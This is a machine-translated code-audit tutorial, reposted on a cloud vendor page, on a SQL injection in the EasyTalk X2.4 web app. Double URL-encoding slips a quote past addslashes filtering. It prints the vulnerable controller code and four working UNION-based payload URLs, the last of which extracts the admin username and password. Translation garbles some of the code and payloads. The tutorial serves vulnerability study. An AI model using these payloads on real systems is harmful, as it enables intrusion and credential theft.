[PHP code audit instance tutorial] SQL injection-2. global protection Bypass UrlDecode-php Tutorial

Source: Internet
Author: User
[PHP code audit instance tutorial] SQL injection-2. global protection Bypass UrlDecode 0x01 background

Currently, WEB programs basically have global filtering for SQL injection, such as enabling GPC in PHP or common in global files. use the addslashes () function on php to filter the received parameters, especially single quotes. In this case, we need to find some encoding and decoding functions to bypass global protection. This article describes the situation of urldecode ~

Vulnerability comes from Wooyun: http://www.wooyun.org/bugs/wooyun-2014-050338

0x02 environment setup

Check the background. We use the easytalk program of a lower version. the version is X2.4.

I packed a copy of the source code: http://pan.baidu.com/s/1bopOFNL

② Decompress the package to the easytalk directory of www and follow the prompts to install it step by step. if you encounter any problems, click baidu or google. after successful access, visit:

0x03 vulnerability analysis

First, let's take a look at the source code structure. the ThinkPHP framework is complicated:

If you are interested, you can study it and continue to look at it. new users can know that ThinkPHP filters the received parameters, and will perform corresponding processing based on whether your server enables GPC:

1. line 3 of the/ThinkPHP/Extend/Library/ORG/Util/Input. class. php file:

/** + ---------------------------------------------------------- * If magic_quotes_gpc is disabled, this function can escape the string + handler * @ access public + handler * @ param string $ string the string to be processed + handler * @ return string + -------------------------------------------------- -------- */Static public function addSlashes ($ string) {if (! Get_magic_quotes_gpc () {$ string = addslashes ($ string);} return $ string ;}

2. use the global search function of the Seay code audit system to search for files with the keyword "urldecode". TopicAction is found. class. php contains a URL for urldecode of the received parameter keyword and SQL query:

3. follow up on this php file and perform urldecode transcoding for it when receiving the keyword, and then immediately bring it into the query, resulting in injection:

Public function topic () {$ keyword = $ this-> _ get ('keyword', 'urldecode '); // use the _ get provided by the ThinkPHP framework to urldecode the received keyword parameters (for details, see http://doc.thinkphp1.cn/manual/get_system_var.html ) If ($ keyword) {$ topic = D ('topic ')-> where ("topicname =' $ keyword'")-> find (); // OK, if ($ topic) {$ isfollow = D ('mytopic ')-> isfollow ($ topic ['id'], $ this-> my ['User _ id']); $ topicusers = D ('mytopicview')-> where ("topicid = '$ topic [id]'") -> order ('Id desc')-> limit (9)-> select (); // getwidget $ widget = M ('topicwidget ') -> where ("topicid = '$ topic [id]'")-> order ('Order 'asc ')-> select (); if ($ widget) {foreach ($ widge T as $ val) {$ topicwidget [$ val ['widgettype'] [] = $ val ;}$ this-> assign ('topicwidget ', $ topicwidget );} else {$ count = $ isfollow = 0;} $ this-> assign ('comefrom', 'topic '); $ this-> assign ('keyword', $ keyword ); $ this-> assign ('topic ', $ topic); $ this-> assign ('topicusers', $ topicusers); $ this-> assign ('isfollow ', $ isfollow); $ this-> assign ('subname ','#'. $ keyword. '#'); $ this-> display ();} else {header ("location :". SITE_URL .'/? M = topic & a = index ');}}
0x04 proof of vulnerability

1. we construct a POC for getting database information:

Http: // localhost/eazytalk /? M = topic & a = topic & keyword = aaa % 2527 and 1 = 2 union select 1, 2, 3, concat (database (), 0x5c, user (), 0x5c, version (), 5% 23

The information obtained successfully is as follows:

Check the MySql log and find that the SQL statement is successfully executed:

2. we construct the POC for getting all the tables in the database eazytalk:

Http: // localhost/eazytalk /? M = topic & a = topic & keyword = aaa % 2527 and 1 = 2 union select 1, 2, 3, (select GROUP_CONCAT (DISTINCT table_name) from information_schema.tables where table_schema = 0x6561721374616c6b)

The following table information is obtained successfully:

4. construct the POC for obtaining information about all fields in the et_users table:

Http: // localhost/eazytalk /? M = topic & a = topic & keyword = aaa % 2527 and 1 = 2 union select 5%, 3, (select GROUP_CONCAT (DISTINCT column_name) from information_schema.columns where table_name = 0x65745F7573657273), 23

All fields in the et_users table are obtained as follows:

5. construct the POC for getting the first account in the et_users table:

Http: // localhost/eazytalk /? M = topic & a = topic & keyword = aaa % 2527 and 1 = 2 union select 1, 2, 3, (select GROUP_CONCAT (DISTINCT user_name, 0x5f, password) from et_users limit 0, 1 ), 5% 23

The admin account password is successfully obtained as follows:

Original article address:

Http://www.cnbraid.com/2015/12/24/sql1/

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.